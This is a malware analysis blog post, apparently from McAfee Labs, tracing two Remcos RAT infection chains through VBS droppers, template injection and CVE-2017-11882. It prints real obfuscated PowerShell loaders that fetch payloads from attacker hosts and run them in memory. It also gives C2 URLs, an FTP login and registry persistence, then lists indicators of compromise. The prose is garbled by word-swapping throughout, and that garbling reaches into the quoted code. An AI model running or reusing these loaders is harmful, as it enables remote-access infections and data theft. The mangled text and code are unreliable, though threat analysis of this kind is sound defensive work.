Authored By Sakshi Jaiswal, Anuradha M
In Q3 2024, McAfee Labs recognized a pointy rise within the Remcos RAT menace. It has emerged as a big menace on this planet of cybersecurity, gaining traction with its skill to infiltrate techniques and compromise delicate information. This malware, usually delivered by phishing emails and malicious attachments, permits cybercriminals to remotely management contaminated machines, making it a robust device for espionage, information theft, and system manipulation. As cyberattacks change into extra refined, understanding the mechanisms behind RemcosRAT and adopting efficient safety measures are essential to defending your techniques from this rising menace. This weblog presents a technical evaluation of two RemcosRAT variants
The warmth map under illustrates the prevalence of Remcos within the discipline in Q3,2024
Variant 1:
Within the first variant of Remcos, executing a VBS file triggers a extremely obfuscated PowerShell script that downloads a number of recordsdata from a command-and-control (C2) server. These recordsdata are then executed, finally resulting in their injection into RegAsm.exe, a reliable Microsoft .NET executable.
An infection Chain
Evaluation:
Executing the VBS file initially triggers a Lengthy-Obfuscated PowerShell command.
It makes use of multi-layer obfuscation, and after de-obfuscation, under is the ultimate readable content material.
The de-obfuscated PowerShell script performs the next actions:
- Firstly, the script checks if the PowerShell model is 2.0. then the file might be downloaded from Googledrive “’https://drive.google.com/uc?export=obtain&id=‘“ in Temp location. and if PowerShell model is just not 2.0 then it downloads string from ftp server.
- It creates a duplicate of itself within the startup location – AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup
- On this case, for the reason that PowerShell model is just not 2.0, it would obtain strings from the FTP server.
- Makes use of FTP to obtain DLL01.txt file, from “ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt” with the username:desckvbrat1 and password: *******************as talked about within the PowerShell script. Utilizing FileZilla with the supplied username and password to obtain recordsdata.
- It has 3 recordsdata DLL01.txt, Entry.txt and Rumpe.txt, which comprises a URL that gives direct entry to a snippet hosted on the PasteCode.io platform.
DLL01.txt File
The snippet above is encoded, after decoding it, we’re left with the ClassLibrary3.dll file.
Rumpe.txt String
Determine 11: Snippet which is hosted on PasteCode.io of Rumpe.txt
The snippet above is encoded, Decoding it generates ClassLibrary1.dll file.
Entry.txt
- Final line of lengthy PowerShell script – [System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType(‘ClassLibrary3.Class1’).GetMethod( ‘prFVI’ ).Invoke( $null , [object[]] ( ‘txt.sz/moc.gnitekrame-uotenok//:sptth‘ , $hzwje , ‘true’ ) ); This line hundreds a .NET meeting into the present software area and invokes it.
- “txt.sz/moc.gnitekrame-uotenok//:sptth” The string is a reversed URL. When reversed, it turns into: https://koneotemarket.com/zst.txt. The uncooked information hosted in that location is base64 encoded and saved in reversed order. As soon as decoded and reversed, the content material is invoked for execution.
- After invocation, it creates a listing in AppData/Native/Microsoft, particularly throughout the LocalLow folder. It then creates one other folder named “System Replace” and locations three recordsdata inside it.
The LocalLow folder is a listing in Home windows used to retailer software information that requires low person permissions. It’s situated throughout the AppData folder. The 2 paths under present how the malware is utilizing a really related path to this reliable home windows path.
reliable Path: C:Customers<YourUsername>AppDataLocalLow
Mislead Path: C:Customers<YourUsername>AppDataLocalMicrosoftLocalLow
On this case, a LocalLow folder has been created contained in the Microsoft listing to mislead customers into believing it’s a reliable path for LocalLow.
A screenshot of the recordsdata dropped into the System Replace folder throughout the deceptive LocalLow listing highlights the tactic used to imitate reliable Home windows directories, desiring to evade person suspicion.
Content material of x3.txt
Then x2.ps1 is executed. Content material of x2.ps1
The command provides a brand new registry entry within the Run key of the Home windows Registry beneath HKCU (HKEY_CURRENT_USER). This entry ensures {that a} PowerShell script (yrnwr.ps1) situated within the System Replace folder contained in the deceptive LocalLow listing is executed at each person login.
After including registry entry, it executes yrnwr.ps1 file. Content material of yrnwr.ps1 which is obfuscated.
After Decoding yrnwr.ps1
It makes use of a course of injection approach to inject the ultimate Remcos payload into the reminiscence of RegAsm.exe, a reliable Microsoft .NET executable.
Reminiscence String of RegAsm.exe which exhibits the traces of Remcos
Mutex Created
A log file is saved within the %ProgramData% listing, the place a folder named “1210” is created. Inside this folder, a file referred to as logs.dat is generated to seize and retailer all system logging actions.
Lastly, it deletes the unique VBS pattern from the system.
Variant 2 – Remcos from Workplace Open XML Doc:
This variant of Remcos comes from Workplace Open XML Doc. The docx file comes from a spam e-mail as an attachment.
An infection Chain:
E-mail Spam:
The e-mail displayed within the above picture comprises an attachment within the type of a .docx file, which is an Workplace Open XML doc.
Evaluation:
From the static evaluation of .docx file, it’s discovered that the malicious content material was current within the relationship file “setting.xml.rels”. Under is the content material of settings.xml.rels file:
From the above content material,it’s evident that it downloads a file from an exterior useful resource which factors to a URL hxxps://dealc.me/NLizza.
The downloaded file is an RTF doc named “seethenewthingswhichgivenmebackwithentirethingstobegetbackonlinewithentirethingsbackwithentirethinsgwhichgivenmenewthingsback_______greatthingstobe.doc”which has an unusually lengthy filename.
The RTF file is crafted to incorporate CVE-2017-11882 Equation Editor vulnerability which is a distant code execution vulnerability that permits an attacker to execute arbitrary code on a sufferer’s machine by embedding malicious objects in paperwork.
Upon execution, the RTF file downloads a VBS script from the URL “hxxp://91.134.96.177/70/picturewithmegetbacktouse.tIF” to the %appdata% listing, saving it as “picturewithmegetbacktouse.vbs”.
Under is the content material of VBS file:
The VBScript is very obfuscated, using a number of layers of string concatenation to assemble a command. It then executes that command utilizing WScript.Shell.3ad868c612a6
Under is the de-obfuscated code:
The above code exhibits that the VBS file launches PowerShell utilizing Base64 encoded strings because the command.
Under is the first PowerShell command line:
“C:WindowsSystem32WindowsPowerShellv1.0powershell.exe” -command $Codigo = ‘LiAoIChbc3RyaW5HXSR2ZXJCT1NFUFJFZmVSRU5jRSlbMSwzXSsneCctam9JTicnKSgoKCd7MH11cmwgJysnPSB7Mn1odHRwczovLycrJ3JhJysndy4nKydnaScrJ3QnKydodScrJ2J1Jysnc2VyJysnY29uJysndGVuJysndCcrJy5jb20vTm8nKydEJysnZScrJ3QnKydlYycrJ3RPbi9Ob0RldCcrJ2VjdCcrJ09uL3JlZicrJ3MnKycvJysnaGVhZHMvbWFpbi9EZXRhaCcrJ05vJysndCcrJ2gnKyctVicrJy50eHR7MicrJ307JysnIHswfWJhJysnc2UnKyc2JysnNEMnKydvbnQnKydlJysnbicrJ3QgPSAnKycoTmV3JysnLU9iaicrJ2UnKydjJysndCBTeXMnKyd0ZW0uTmUnKyd0LicrJ1dlYicrJ0MnKydsaWVudCkuRCcrJ28nKyd3bmwnKydvYScrJ2RTdHInKydpbicrJ2coJysneycrJzB9dScrJ3JsKTsgeycrJzAnKyd9JysnYmluYXJ5QycrJ29udGUnKyduJysndCA9JysnICcrJ1tTJysneXN0JysnZW0uQ28nKydudmUnKydydCcrJ10nKyc6OkYnKydyb21CYXNlNjRTdHJpbicrJ2coezB9YmFzZScrJzYnKyc0QycrJ29udGUnKydudCcrJyknKyc7IHsnKycwfScrJ2FzcycrJ2UnKydtYmx5JysnID0nKycgWycrJ1JlZmxlY3QnKydpb24uQXNzZW1ibCcrJ3ldJysnOjpMJysnbycrJ2FkKHswfWJpbicrJ2FyeUMnKydvbicrJ3QnKydlbnQpOyBbZG5saScrJ2IuSU8uSG9tJysnZScrJ106OlZBSSh7JysnMX0nKyd0JysneCcrJ3QuJysnQ1ZGR0dSLzA3Lzc3JysnMS42OS4nKyc0MycrJzEuMScrJzkvLycrJzpwJysndHRoezEnKyd9LCB7JysnMScrJ30nKydkZXNhdGl2YWRvezEnKyd9LCB7MX1kZXMnKydhdGknKyd2YWQnKydvezF9LCB7MX1kZXMnKydhdCcrJ2knKyd2YWRvezF9LCcrJyB7MScrJ31SZScrJ2dBJysncycrJ217JysnMX0sJysnIHsnKycxfXsnKycxfSwnKyd7MX17MX0pJyktZiAgW2NIYVJdMzYsW2NIYVJdMzQsW2NIYVJdMzkpICk=’;$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Base64 decoded content material:
The above base64 decoded content material is used as enter to the 2nd PowerShell command.
Under is the 2nd PowerShell command line:
“C:WindowsSystem32WindowsPowerShellv1.0powershell.exe” -windowstyle hidden -executionpolicy bypass -NoProfile -command “. ( ([strinG]$verBOSEPREfeRENcE)[1,3]+’x’-joIN”)(((‘{0}url ‘+’= {2}https://’+’ra’+’w.’+’gi’+’t’+’hu’+’bu’+’ser’+’con’+’ten’+’t’+’.com/No’+’D’+’e’+’t’+’ec’+’tOn/NoDet’+’ect’+’On/ref’+’s’+’/’+’heads/principal/Detah’+’No’+’t’+’h’+’-V’+’.txt{2’+’};’+’ {0}ba’+’se’+’6’+’4C’+’ont’+’e’+’n’+’t = ‘+'(New’+’-Obj’+’e’+’c’+’t Sys’+’tem.Ne‘+’t.’+’Net’+’C’+’lient).D’+’o’+’wnl’+’oa’+’dStr’+’in’+’g(‘+'{‘+’0}u’+’rl); {‘+’0’+’}’+’binaryC’+’onte’+’n’+’t =’+’ ‘+'[S’+’yst’+’2024 – New ‘+’nve’+’rt’+’]’+’::F’+’romBase64Strin’+’g({0}base’+’6’+’4C’+’onte’+’nt’+’)’+’; {‘+’0}’+’ass’+’e’+’mbly’+’ =’+’ [‘+’Reflect’+’ion.Assembl’+’y]’+’::L’+’o’+’advert({0}bin’+’aryC’+’on’+’t’+’ent); [dnli’+’b.IO.Hom’+’e’+’]::VAI({‘+’1}’+’t’+’x’+’t.’+’CVFGGR/07/77’+’1.69.’+’43’+’1.1’+’9//’+’:p’+’tth{1’+’}, {‘+’1’+’}’+’desativado{1’+’}, {1}des’+’ati’+’vad’+’o{1}, {1}des’+’at’+’i’+’vado{1},’+’ {1’+’}Re’+’gA’+’s’+’m{‘+’1},’+’ {‘+’1}{‘+’1},’+'{1}{1})’)-f [cHaR]36,[cHaR]34,[cHaR]39) )”
- The PowerShell script makes use of string obfuscation by combining elements of strings utilizing be a part of and concatenation. This hides the precise URL being fetched.
- It constructs a URL that factors to a uncooked GitHub file: hxxps://uncooked.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/principal/DetahNoth-V.txt
Under is the content material of “DetahNoth-V.txt”:
Under is the code snippet to decode the above Base64 string into binary format and cargo it into reminiscence as a .NET meeting. This technique avoids writing recordsdata to disk, which makes it more durable for some safety merchandise to detect the operation.
The decoded binary content material results in a DLL file named as “dnlib.dll”.
Under is the final a part of code within the 2nd PowerShell command line:
As soon as the meeting “dnlib.dll” is loaded, it calls a technique VAI from a sort dnlib.IO.Dwelling throughout the loaded meeting. This technique is invoked with a number of arguments:
- txt.CVFGGR/07/771.69.431.19//:ptth: It is a reversed URL (hxxp://91.134.96.177/70/RGGFVC.txt) that may level to a different useful resource.
- desativado (translated from Portuguese as “deactivated”): Handed a number of instances as arguments. That is used as a parameter for deactivating sure features.
- RegAsm: That is the title of the .NET meeting registration device, doubtlessly indicating that the script is registering or working with assemblies on the machine.
Under is the content material of URL -hxxp://91.134.96.177/70/RGGFVC.txt:
The content material proven above is a reversed, Base64-encoded binary payload, which, when decoded, leads to the Remcos EXE payload.
Indicators of Compromise (IOCs)
Variant 1
| File Sort | SHA256 |
| Vbs | d81847976ea210269bf3c98c5b32d40ed9daf78dbb1a9ce638ac472e501647d2 |
Variant 2
| File Sort | SHA256 |
| Eml | 085ac8fa89b6a5ac1ce385c28d8311c6d58dd8545c3b160d797e3ad868c612a6 |
| Docx | 69ff7b755574add8b8bb3532b98b193382a5b7cbf2bf219b276cb0b51378c74f |
| Rtf | c86ada471253895e32a771e3954f40d1e98c5fbee4ce702fc1a81e795063170a |
| Vbs | c09e37db3fccb31fc2f94e93fa3fe8d5d9947dbe330b0578ae357e88e042e9e5 |
| dnlib.dll | 12ec76ef2298ac0d535cdb8b61a024446807da02c90c0eebcde86b3f9a04445a |
| Remcos EXE | 997371c951144335618b3c5f4608afebf7688a58b6a95cdc71f237f2a7cc56a2 |
URLs
| hxxps://dealc.me/NLizza |
| hxxp://91.134.96.177/70/picturewithmegetbacktouse.tIF |
| hxxps://uncooked.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/principal/DetahNoth-V.txt |
| hxxp://91.134.96.177/70/RGGFVC.txt |
Detections:
Variant 1
| FileType | Detection |
| VBS | Trojan:Script/Remcos.JD |
Variant 2
| FileType | Detection |
| Docx | Trojan:Workplace/CVE20170199.D |
| RTF | Trojan:Workplace/CVE201711882.A |
| VBS | Trojan: Script/Remcos.AM |
| Powershell | Trojan: Script/Remcos.PS1 |
| EXE | Trojan:Win/Genericy.AGP |
Conclusion
In conclusion, the rise of Remcos RAT highlights the evolving nature of cyber threats and the growing sophistication of malware. As this distant entry Trojan continues to focus on customers by phishing emails and malicious attachments, the necessity for proactive cybersecurity measures has by no means been extra essential. By understanding the ways utilized by cybercriminals behind Remcos RAT and implementing strong defenses reminiscent of common software program updates, e-mail filtering, and community monitoring, organizations can higher defend their techniques and delicate information. Staying vigilant and knowledgeable about rising threats like Remcos RAT is important in safeguarding in opposition to future cyberattacks.
References
